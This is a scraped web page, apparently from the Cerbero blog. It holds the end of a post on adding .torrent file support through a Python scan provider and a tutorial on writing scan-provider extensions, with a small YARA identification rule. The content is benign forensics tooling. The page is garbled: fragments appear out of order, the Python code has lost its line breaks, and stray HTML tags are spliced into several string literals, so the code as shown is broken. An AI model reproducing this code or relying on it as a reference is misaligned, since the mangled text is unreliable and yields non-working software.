<option value="https://blog.cerbero.io/2023/12/"> December 2023 (3)</option>
<option value="https://blog.cerbero.io/2023/11/"> November 2023 (7)</option>
<option value="https://blog.cerbero.io/2023/10/"> October 2023 (3)</option>
<option value="https://blog.cerbero.io/2023/09/"> September 2023 (1)</option>
<option value="https://blog.cerbero.io/2023/07/"> July 2023 (1)</option>
<option value="https://blog.cerbero.io/2023/05/"> May 2023 (11)</option>
<option value="https://blog.cerbero.io/2023/03/"> March 2023 (9)</option>
<option value="https://blog.cerbero.io/2023/02/"> February 2023 (3)</option>
<option value="https://blog.cerbero.io/2023/01/"> January 2023 (1)</option>
<option value="https://blog.cerbero.io/2022/11/"> November 2022 (1)</option>
<option value="https://blog.cerbero.io/2022/09/"> September 2022 (2)</option>
<option value="https://blog.cerbero.io/2022/08/"> August 2022 (2)</option>
<option value="https://blog.cerbero.io/2022/07/"> July 2022 (3)</option>
<option value="https://blog.cerbero.io/2022/06/"> June 2022 (2)</option>
<option value="https://blog.cerbero.io/2022/05/"> May 2022 (5)</option>
<option value="https://blog.cerbero.io/2022/04/"> April 2022 (3)</option>
<option value="https://blog.cerbero.io/2022/03/"> March 2022 (4)</option>
<option value="https://blog.cerbero.io/2022/02/"> February 2022 (6)</option>
<option value="https://blog.cerbero.io/2022/01/"> January 2022 (1)</option>
<option value="https://blog.cerbero.io/2021/11/"> November 2021 (4)</option>
<option value="https://blog.cerbero.io/2021/10/"> October 2021 (5)</option>
<option value="https://blog.cerbero.io/2021/09/"> September 2021 (7)</option>
<option value="https://blog.cerbero.io/2021/06/"> June 2021 (1)</option>
<option value="https://blog.cerbero.io/2021/04/"> April 2021 (1)</option>
<option value="https://blog.cerbero.io/2021/03/"> March 2021 (4)</option>
<option value="https://blog.cerbero.io/2021/02/"> February 2021 (1)</option>
<option value="https://blog.cerbero.io/2020/12/"> December 2020 (1)</option>
<option value="https://blog.cerbero.io/2020/11/"> November 2020 (1)</option>
<option value="https://blog.cerbero.io/2020/10/"> October 2020 (1)</option>
<option value="https://blog.cerbero.io/2020/09/"> September 2020 (2)</option>
<option value="https://blog.cerbero.io/2020/07/"> July 2020 (2)</option>
<option value="https://blog.cerbero.io/2020/01/"> January 2020 (1)</option>
<option value="https://blog.cerbero.io/2019/09/"> September 2019 (1)</option>
<option value="https://blog.cerbero.io/2019/08/"> August 2019 (2)</option>
<option value="https://blog.cerbero.io/2019/07/"> July 2019 (1)</option>
<option value="https://blog.cerbero.io/2019/06/"> June 2019 (1)</option>
<option value="https://blog.cerbero.io/2019/05/"> May 2019 (3)</option>
<option value="https://blog.cerbero.io/2019/04/"> April 2019 (2)</option>
<option value="https://blog.cerbero.io/2018/06/"> June 2018 (1)</option>
<option value="https://blog.cerbero.io/2018/04/"> April 2018 (1)</option>
<option value="https://blog.cerbero.io/2018/03/"> March 2018 (1)</option>
<option value="https://blog.cerbero.io/2018/01/"> January 2018 (1)</option>
<option value="https://blog.cerbero.io/2017/11/"> November 2017 (2)</option>
<option value="https://blog.cerbero.io/2017/03/"> March 2017 (5)</option>
<option value="https://blog.cerbero.io/2016/07/"> July 2016 (2)</option>
<option value="https://blog.cerbero.io/2016/05/"> May 2016 (2)</option>
<option value="https://blog.cerbero.io/2016/04/"> April 2016 (1)</option>
<option value="https://blog.cerbero.io/2015/10/"> October 2015 (2)</option>
<option value="https://blog.cerbero.io/2015/09/"> September 2015 (2)</option>
<option value="https://blog.cerbero.io/2015/06/"> June 2015 (2)</option>
<option value="https://blog.cerbero.io/2014/12/"> December 2014 (2)</option>
<option value="https://blog.cerbero.io/2014/10/"> October 2014 (1)</option>
<option value="https://blog.cerbero.io/2014/09/"> September 2014 (3)</option>
<option value="https://blog.cerbero.io/2014/08/"> August 2014 (1)</option>
<option value="https://blog.cerbero.io/2014/07/"> July 2014 (1)</option>
<option value="https://blog.cerbero.io/2013/12/"> December 2013 (2)</option>
<option value="https://blog.cerbero.io/2013/11/"> November 2013 (5)</option>
<option value="https://blog.cerbero.io/2013/10/"> October 2013 (5)</option>
<option value="https://blog.cerbero.io/2013/09/"> September 2013 (6)</option>
<option value="https://blog.cerbero.io/2013/08/"> August 2013 (6)</option>
<option value="https://blog.cerbero.io/2013/07/"> July 2013 (1)</option>
<option value="https://blog.cerbero.io/2013/06/"> June 2013 (4)</option>
<option value="https://blog.cerbero.io/2013/05/"> May 2013 (7)</option>
<option value="https://blog.cerbero.io/2013/04/"> April 2013 (5)</option>
<option value="https://blog.cerbero.io/2013/03/"> March 2013 (3)</option>
<option value="https://blog.cerbero.io/2013/02/"> February 2013 (4)</option>
<option value="https://blog.cerbero.io/2013/01/"> January 2013 (3)</option>
<option value="https://blog.cerbero.io/2012/12/"> December 2012 (3)</option>
<option value="https://blog.cerbero.io/2012/11/"> November 2012 (5)</option>
<option value="https://blog.cerbero.io/2012/10/"> October 2012 (3)</option>
<option value="https://blog.cerbero.io/2012/09/"> September 2012 (1)</option>
<option value="https://blog.cerbero.io/2012/08/"> August 2012 (2)</option>
<option value="https://blog.cerbero.io/2012/07/"> July 2012 (2)</option>
<option value="https://blog.cerbero.io/2012/06/"> June 2012 (2)</option>
<option value="https://blog.cerbero.io/2012/05/"> May 2012 (2)</option>
<option value="https://blog.cerbero.io/2012/04/"> April 2012 (1)</option>
<option value="https://blog.cerbero.io/2012/03/"> March 2012 (6)</option>
<option value="https://blog.cerbero.io/2012/02/"> February 2012 (5)</option>
<option value="https://blog.cerbero.io/2012/01/"> January 2012 (8)</option>
<option value="https://blog.cerbero.io/2011/11/"> November 2011 (1)</option>
<option value="https://blog.cerbero.io/2011/08/"> August 2011 (1)</option>
</select>
<script>(function(){
var dropdown=document.getElementById("archives-dropdown-4");
function onSelectChange(){
if(dropdown.options[ dropdown.selectedIndex ].value!==''){
document.location.href=this.options[ this.selectedIndex ].value;
}}
dropdown.onchange=onSelectChange;
})();</script>
</section> </aside><footer id="colophon" class="site-footer">
<nav class="main-navigation" aria-label="Footer Primary Menu">
<div class="menu-main-container"><ul id="menu-main-1" class="primary-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1923"><a href="https://cerbero.io">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2790"><a href="#">Products</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2181"><a href="https://cerbero.io/suite/">Cerbero Suite</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2183"><a href="https://cerbero.io/engine/">Cerbero Engine</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2567"><a href="https://cerbero.io/packages/">Packages</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2430"><a href="https://cerbero.io/e-zine/">E-Zine</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1926"><a href="/">Blog</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2791"><a href="#">Support</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3000"><a href="https://cerbero.io/manual/">User Manual</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2165"><a href="https://sdk.cerbero.io/">SDK Documentation</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2514"><a href="https://cerbero.io/faq/">FAQ</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1927"><a href="https://cerbero.io/resources/">Resources</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1930"><a href="https://cerbero.io/contact/">Contact</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2792"><a href="https://cerbero.io/shop/">Shop</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1928"><a href="https://cerbero.io/my-account/">My account</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1929"><a href="https://cerbero.io/cart/">Cart</a></li> </ul> </li> </ul></div></nav>
<div class="site-info"> <span class="site-title"><a href="https://blog.cerbero.io/" rel="home">Cerbero Blog</a></span> <a href="https://wordpress.org/" class="imprint"> Proudly powered by WordPress </a></div></footer><script type="speculationrules">{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/twentysixteen-child\/*","\/wp-content\/themes\/twentysixteen\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}</script>
<script src="//blog.cerbero.io/wp-content/cache/wpfc-minified/e5g10mzi/a6zsp.js"></script>
<script id="enlighterjs-js-after">!function(e,n){if("undefined"!=typeof EnlighterJS){var o={"selectors":{"block":"pre","inline":"code"},"options":{"indent":4,"ampersandCleanup":true,"linehover":false,"rawcodeDbclick":false,"textOverflow":"scroll","linenumbers":false,"theme":"enlighter","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""}};(e.EnlighterJSINIT=function(){EnlighterJS.init(o.selectors.block,o.selectors.inline,o.options)})()}else{(n&&(n.error||n.log)||function(){})("Error: EnlighterJS resources not loaded yet!")}}(window,console);</script></s></b></hex><table id="1"></table></hl></ui>
class TorrentObject(CFFObject): # ... def GetTrackers(self): d = self.GetDictionary() trackers = [] dup = set() if b"announce" in d and type(d[b"announce"]) is bytes: trackers.append(d[b"announce"]) dup.add(trackers[0]) if b"announce-list" in d: al = d[b"announce-list"] for a in al: if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes: trackers.append(a[0]) dup.add(a[0]) return trackers def trackersViewCb(cv, trackers, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(1) labels = NTStringList() labels.append("Tracker") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setRowCount(len(trackers)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, trackers[data.row].decode("utf-8", errors="ignore")) return 0 class TorrentScanProvider(ScanProvider): # ... def _formatViewData(self, sdata): # ... elif sdata.fid == self.FormatItem_Trackers: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hl margin="0">") sdata.setCallback(trackersViewCb, self.obj.GetTrackers()) return True return False<p><a href="/wp-content/uploads/2015/09/torrent/trackers.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/torrent/trackers.png" alt="Trackers"></a></p><p>When retrieving data from the dictionary, we also make sure that it is in the correct type, so that the code which handles this data won't end up generating an exception when trying to process an unexpected type.</p><p>And now the files:</p><pre lang="python">class TorrentObject(CFFObject): # ... def GetFiles(self): d = self.GetDictionary() if not b"info" in d: return [] d = d[b"info"] if not type(d) is dict: return [] files = [] if not b"files" in d: if b"name" in d and type(d[b"name"]) is bytes: sz = d.get(b"length", 0) files.append((d[b"name"], sz if type(sz) is int else 0)) else: flist = d[b"files"] if not type(flist) is list: return [] for fd in flist: if type(fd) is dict: if b"path" in fd: pt = fd[b"path"] if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes: sz = fd.get(b"length", 0) files.append((pt[0], sz if type(sz) is int else 0)) return files def filesViewCb(cv, files, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(2) labels = NTStringList() labels.append("Name") labels.append("Size") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setColumnCWidth(1, 35) tv.setRowCount(len(files)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, files[data.row][0].decode("utf-8", errors="ignore")) sz = files[data.row][1] data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz)) return 0 class TorrentScanProvider(ScanProvider): # ... def _formatViewData(self, sdata): # ... elif sdata.fid == self.FormatItem_Files: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hl margin="0"></hl></ui></pre><table id="1"> </table>") sdata.setCallback(filesViewCb, self.obj.GetFiles()) return True return False<p><a href="/wp-content/uploads/2015/09/torrent/files.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/torrent/files.png" alt="Files"></a></p><p>And that's it. Now again the whole code for a better overview:</p><pre lang="python">from Pro.Core import * from Pro.UI import pvnInit, pvnGetTableRow import pprint MAX_TORRENT_SIZE = 10485760 # 10 MBs # # BEGIN OF 3RD PARTY CODE (adapted to work with Python 3) # # The contents of this file are subject to the BitTorrent Open Source License # Version 1.1 (the License). You may not copy or use this file, in either # source code or executable form, except in compliance with the License. You # may obtain a copy of the License at http://www.bittorrent.com/license/. # # Software distributed under the License is distributed on an AS IS basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # Written by Petru Paler def decode_int(x, f): f += 1 newf = x.index(0x65, f) n = int(x[f:newf]) if x[f] == 0x2D: # - if x[f + 1] == 0x30: raise ValueError elif x[f] == 0x30 and newf != f+1: raise ValueError return (n, newf+1) def decode_string(x, f): colon = x.index(0x3A, f) # : n = int(x[f:colon]) if x[f] == 0x30 and colon != f+1: raise ValueError colon += 1 return (x[colon:colon+n], colon+n) def decode_list(x, f): r, f = [], f+1 while x[f] != 0x65: # e v, f = decode_func[x[f]](x, f) r.append(v) return (r, f + 1) def decode_dict(x, f): r, f = {}, f+1 while x[f] != 0x65: # e k, f = decode_string(x, f) r[k], f = decode_func[x[f]](x, f) return (r, f + 1) decode_func = {} decode_func[0x6C] = decode_list # l decode_func[0x64] = decode_dict # d decode_func[0x69] = decode_int # i decode_func[0x30] = decode_string decode_func[0x31] = decode_string decode_func[0x32] = decode_string decode_func[0x33] = decode_string decode_func[0x34] = decode_string decode_func[0x35] = decode_string decode_func[0x36] = decode_string decode_func[0x37] = decode_string decode_func[0x38] = decode_string decode_func[0x39] = decode_string def bdecode(x): try: r, l = decode_func[x[0]](x, 0) except (IndexError, KeyError, ValueError): return {} if l != len(x): return {} return r # # END OF 3RD PARTY CODE # class TorrentObject(CFFObject): def __init__(self): super(TorrentObject, self).__init__() self.SetObjectFormatName("TORRENT") self.SetDefaultEndianness(ENDIANNESS_LITTLE) self.tdict = None def GetDictionary(self): if self.tdict == None: size = min(self.GetSize(), MAX_TORRENT_SIZE) data = self.Read(0, size) self.tdict = bdecode(bytes(data)) return self.tdict def CreationDate(self): d = self.GetDictionary() cd = d.get(b"creation date", None) if cd == None or not type(cd) is int: return NTDateTime() return NTDateTime.fromMSecsSinceEpoch(cd * 1000) def GetTrackers(self): d = self.GetDictionary() trackers = [] dup = set() if b"announce" in d and type(d[b"announce"]) is bytes: trackers.append(d[b"announce"]) dup.add(trackers[0]) if b"announce-list" in d: al = d[b"announce-list"] for a in al: if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes: trackers.append(a[0]) dup.add(a[0]) return trackers def GetFiles(self): d = self.GetDictionary() if not b"info" in d: return [] d = d[b"info"] if not type(d) is dict: return [] files = [] if not b"files" in d: if b"name" in d and type(d[b"name"]) is bytes: sz = d.get(b"length", 0) files.append((d[b"name"], sz if type(sz) is int else 0)) else: flist = d[b"files"] if not type(flist) is list: return [] for fd in flist: if type(fd) is dict: if b"path" in fd: pt = fd[b"path"] if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes: sz = fd.get(b"length", 0) files.append((pt[0], sz if type(sz) is int else 0)) return files def trackersViewCb(cv, trackers, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(1) labels = NTStringList() labels.append("Tracker") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setRowCount(len(trackers)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, trackers[data.row].decode("utf-8", errors="ignore")) return 0 def filesViewCb(cv, files, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(2) labels = NTStringList() labels.append("Name") labels.append("Size") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setColumnCWidth(1, 35) tv.setRowCount(len(files)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, files[data.row][0].decode("utf-8", errors="ignore")) sz = files[data.row][1] data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz)) return 0 class TorrentScanProvider(ScanProvider): def __init__(self): super(TorrentScanProvider, self).__init__() self.obj = None self.meta_keys = [b"created by", b"creation date", b"comment"] # format item IDs self.FormatItem_Dictionary = 1 self.FormatItem_Trackers = 2 self.FormatItem_Files = 3 # format item names self.fi_names = ["Dictionary", "Trackers", "Files"] def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TorrentObject() self.obj.Load(self.getStream()) d = self.obj.GetDictionary() return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR def _startScan(self): d = self.obj.GetDictionary() if any(mk in d for mk in self.meta_keys): e = ScanEntryData() e.category = SEC_Privacy e.type = CT_MetaData self.addEntry(e) if self.obj.GetSize() > MAX_TORRENT_SIZE: e = ScanEntryData() e.category = SEC_Warn e.type = CT_UnaccountedSpace self.addEntry(e) return self.SCAN_RESULT_FINISHED def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_MetaData: d = self.obj.GetDictionary() out = proTextStream() for mk in self.meta_keys: if mk in d: tmk = mk.decode("utf-8", errors="ignore") if tmk == "creation date": dt = self.obj.CreationDate() tmv = dt.toString() if dt.isValid() else "?" else: tmv = d[mk].decode("utf-8", errors="ignore") out._print(tmk) out._print(": ") out._print(tmv) out.nl() sdata.setViews(SCANVIEW_TEXT) sdata.data.setData(out.buffer) return True elif sdata.type == CT_UnaccountedSpace: sdata.setViews(SCANVIEW_TEXT) sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,)) return True return False def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, self.FormatItem_Dictionary) ft.appendChild(fi, self.FormatItem_Trackers) ft.appendChild(fi, self.FormatItem_Files) return ft def _formatViewInfo(self, finfo): if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names): finfo.text = self.fi_names[finfo.fid - 1] return True return False def _formatViewData(self, sdata): if sdata.fid == self.FormatItem_Dictionary: sdata.setViews(SCANVIEW_TEXT) txt = pprint.pformat(self.obj.GetDictionary()) sdata.data.setData(txt) return True elif sdata.fid == self.FormatItem_Trackers: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hl margin="0"></hl></ui></pre><table id="1"> </table>") sdata.setCallback(trackersViewCb, self.obj.GetTrackers()) return True elif sdata.fid == self.FormatItem_Files: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hl margin="0"></hl></ui><table id="1"></table>") sdata.setCallback(filesViewCb, self.obj.GetFiles()) return True return False def torrentAllocator(): return TorrentScanProvider()<p>We could still extract more information from the torrent file. For instance, we could show the list of hashes and to which portion of which file they belong to. If that's interesting for forensic purposes, we can easily add this view in the future.</p><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/torrent-support/" rel="bookmark"><time class="entry-date published" datetime="2015-09-23T16:50:31+00:00">September 23, 2015</time><time class="updated" datetime="2021-04-01T16:32:00+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/forensics/" rel="category tag">Forensics</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/p2p/" rel="tag">P2P</a>, <a href="https://blog.cerbero.io/tag/torrent/" rel="tag">Torrent</a>, <a href="https://blog.cerbero.io/tag/trackers/" rel="tag">Trackers</a></span><span class="comments-link"><a href="https://blog.cerbero.io/torrent-support/#respond">Leave a comment<span class="screen-reader-text"> on Torrent Support</span></a></span> </footer><article id="post-1551" class="post-1551 post type-post status-publish format-standard hentry category-suite-standard"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark">Scan Providers</a></h2> </header> <div class="entry-content"> <p>Version 2.5.0 is close to being released and comes with the last type of extension exposed to Python: scan providers. Scan providers extensions are not only the most complex type of extensions, but also the most powerful ones as they allow to add support for new file formats entirely from Python! </p> <p>This feature required exposing a lot more of the SDK to Python and can’t be completely discussed in one post. This post is going to introduce the topic, while future posts will show real life examples.</p> <p>Let’s start from the list of Python scan providers under Extensions -> Scan providers:</p> <p><a href="/wp-content/uploads/2015/09/scanp/extlist.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/extlist.png" alt="Scan provider extensions"></a></p> <p>This list is retrieved from the configuration file ‘scanp.cfg’. Here’s an example entry:</p> <pre lang="ini">[TEST] label = Test scan provider ext = test2,test3 group = db file = Test.py allocator = allocator</pre> <p>The name of the section has two purposes: it specifies the name of the format being supported (in this case ‘TEST’) and also the name of the extension, which automatically is associated to that format (in this case ‘.test’, case insensitive). The hard limit for format names is 9 characters for now, this may change in the future if more are needed. The <strong>label</strong> is the description. The <strong>ext</strong> parameter is optional and specifies additional extensions to be associated to the format. <strong>group</strong> specifies the type of file which is being supported; available groups are: img, video, audio, doc, font, exe, manexe, arch, db, sys, cert, script. <strong>file</strong> specifies the Python source file and <strong>allocator</strong> the function which returns a new instance of the scan provider class.</p> <p>Let’s start with the allocator:</p> <pre lang="python">def allocator(): return TestScanProvider()</pre> <p>It just returns a new instance of <strong>TestScanProvider</strong>, which is a class dervided from <strong>ScanProvider</strong>:</p> <pre lang="python">class TestScanProvider(ScanProvider): def __init__(self): super(TestScanProvider, self).__init__() self.obj = None</pre> <p>Every scan provider has some mandatory methods it must override, let’s begin with the first ones:</p> <pre lang="python"> def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TestObject() self.obj.Load(self.getStream()) return self.SCAN_RESULT_OK</pre> <p><strong>_clear</strong> gives a chance to free internal resources when they’re no longer used. In Python this is not usually important as member objects will automatically be freed when their reference count reaches zero.</p> <p><strong>_getObject</strong> must return the internal instance of the object being parsed. This must return an instance of a <strong>CFFObject</strong> derived class.</p> <p><strong>_initObject</strong> creates the object instance and loads the data stream into it. In the sample above we assume it being successful. Otherwise, we would have to return <strong>SCAN_RESULT_ERROR</strong>. This method is not called by the main thread, so that it doesn’t block the UI during long parse operations.</p> <p>Let’s take a look at the <strong>TestObject</strong> class:</p> <pre lang="python">class TestObject(CFFObject): def __init__(self): super(TestObject, self).__init__() self.SetObjectFormatName("TEST") self.SetDefaultEndianness(ENDIANNESS_LITTLE)</pre> <p>This is a minimalistic implementation of a <strong>CFFObject</strong> derived class. Usually it should contain at least an override of the <strong>CustomLoad</strong> method, which gives the opportunity to fail when the data stream is first loaded through the <strong>Load</strong> method. <strong>SetDefaultEndianness</strong> wouldn’t even be necessary, as every object defaults to little endian by default. <strong>SetObjectFormatName</strong>, on the other hand, is very important, as it sets the internal format name of the object.</p> <p>Let’s now take a look at how we scan a file:</p> <pre lang="python"> def _startScan(self): return self.SCAN_RESULT_OK def _threadScan(self): e = ScanEntryData() e.category = SEC_Warn e.type = CT_NativeCode self.addEntry(e)</pre> <p>The code above will issue a single warning concerning native code. When <strong>_startScan</strong> returns <strong>SCAN_RESULT_OK</strong>, <strong>_threadScan</strong> will be called from a thread other than the main UI one. The logic behind this is that <strong>_startScan</strong> is actually called from the main thread and if the scan of the file doesn’t require complex operations, like in the case above, then the method could return <strong>SCAN_RESULT_FINISHED</strong> and then <strong>_threadScan</strong> won’t be called at all. During a threaded scan, an abort by the user can be detected via the <strong>isAborted</strong> method.</p> <p>From the UI side point of view, when a scan entry is clicked in summary, the scan provider is supposed to return UI information. </p> <pre lang="python"> def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_NativeCode: sdata.setViews(SCANVIEW_TEXT) sdata.data.setData("Hello, world!") return True return False</pre> <p>This will display a text field with a predefined content when the user clicks the scan entry in the summary. This is fairly easy, but what happens when we have several entries of the same type and need to differentiate between them? There’s where the <strong>data</strong> member of <strong>ScanEntryData</strong> plays a role, this is a string which will be included in the report xml and passed again back to <strong>_scanViewData</strong> as an xml node.</p> <p>For instance:</p> <pre lang="python">e.data = "<o>1234</o>"</pre> <p>Becomes this in the final XML report:</p> <pre lang="xml"><d> <o>1234</o> </d></pre> <p>The <strong>dnode</strong> argument of <strong>_scanViewData</strong> points to the ‘d’ node and its first child will be the ‘o’ node we passed. the <strong>xml</strong> argument represents an instance of the <strong>NTXml</strong> class, which can be used to retrieve the children of the <strong>dnode</strong>.</p> <p>But this is only half of the story: some of the scan entries may represent embedded files (category <strong>SEC_File</strong>), in which case the <strong>_scanViewData</strong> method must return the data representing the file.</p> <p>Apart from scan entries, we may also want the user to explore the format of the file. To do that we must return a tree representing the structure of our file:</p> <pre lang="python"> def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, 1) ft.appendChild(fi, 2) return ft</pre> <p>The <strong>enableIDs</strong> method must be called right after creating a new <strong>FormatTree</strong> class. The code above creates a format item with id 1 with a child item with id 2, which results in the following:</p> <p><a href="/wp-content/uploads/2015/09/scanp/format.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/format.png" alt="Format tree"></a></p> <p>But of course, we haven’t specified neither labels nor different icons in the function above. This information is retrieved for each item when required through the following method:</p> <pre lang="python"> def _formatViewInfo(self, finfo): if finfo.fid == 1: finfo.text = "directory" finfo.icon = PubIcon_Dir return True elif finfo.fid == 2: finfo.text = "entry" return True return False</pre> <p>The various items are identified by their id, which was specified during the creation of the tree.</p> <p>The UI data for each item is retrieved through the <strong>_formatViewData</strong> method:</p> <pre lang="python"> def _formatViewData(self, sdata): if sdata.fid == 1: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui></pre></div></article><table id="1"> </table><hex id="2">") sdata.setCallback(cb, None) return True return False <p>This will display a custom view with a table and a hex view separated by a splitter:</p> <p><a href="/wp-content/uploads/2015/09/scanp/cview.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/cview.png" alt="Custom view"></a></p> <p>Of course, also have specified the callback for our custom view:</p> <pre lang="python">def cb(cv, ud, code, view, data): if code == pvnInit: return 1 return 0</pre> <p>It is good to remember that format item IDs and IDs used in custom views are used to encode bookmark jumps. So if they change, saved bookmark jumps become invalid.</p> <p>And here again the whole code for a better overview:</p> <pre lang="python">from Pro.Core import * from Pro.UI import pvnInit, PubIcon_Dir class TestObject(CFFObject): def __init__(self): super(TestObject, self).__init__() self.SetObjectFormatName("TEST") self.SetDefaultEndianness(ENDIANNESS_LITTLE) def cb(cv, ud, code, view, data): if code == pvnInit: return 1 return 0 class TestScanProvider(ScanProvider): def __init__(self): super(TestScanProvider, self).__init__() self.obj = None def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TestObject() self.obj.Load(self.getStream()) return self.SCAN_RESULT_OK def _startScan(self): return self.SCAN_RESULT_OK def _threadScan(self): print("thread msg") e = ScanEntryData() e.category = SEC_Warn e.type = CT_NativeCode self.addEntry(e) def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_NativeCode: sdata.setViews(SCANVIEW_TEXT) sdata.data.setData("Hello, world!") return True return False def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, 1) ft.appendChild(fi, 2) return ft def _formatViewInfo(self, finfo): if finfo.fid == 1: finfo.text = "directory" finfo.icon = PubIcon_Dir return True elif finfo.fid == 2: finfo.text = "entry" return True return False def _formatViewData(self, sdata): if sdata.fid == 1: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui></pre></hex><table id="1"></table><hex id="2">") sdata.setCallback(cb, None) return True return False def allocator(): return TestScanProvider() <p>If you have noticed from the screen-shot above, the analysed file is called ‘a.t’ and as such doesn’t automatically associate to our ‘test’ format. So how does it associate anyway?</p> <p>Clearly Profiler doesn’t rely on extensions alone to identify the format of a file. For external scan providers a signature mechanism based on YARA has been introduced. In the <strong>config</strong> directory of the user, you can create a file named ‘yara.plain’ and insert your identification rules in it, e.g.:</p> <pre lang="text">rule test { strings: $sig = "test" condition: $sig at 0 }</pre> <p>This rule will identify the format as ‘test’ if the first 4 bytes of the file match the string ‘test’: the name of the rule identifies the format.</p> <p>The file ‘yara.plain’ will be compiled to the binary ‘yara.rules’ file at the first run. In order to refresh ‘yara.rules’, you must delete it.</p> <p>One important thing to remember is that a rule isn’t matched against an entire file, but only against the first 512 bytes.</p> <p>Of course, our provider behaves 100% like all other providers and can be used to load embedded files:</p> <p><a href="/wp-content/uploads/2015/09/scanp/embfiles.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/embfiles.png" alt="Embedded files"></a></p> <p>Our new provider is used automatically when an embedded file is identified as matching our format.</p><footer class="entry-footer"> <span class="byline"><img alt="" 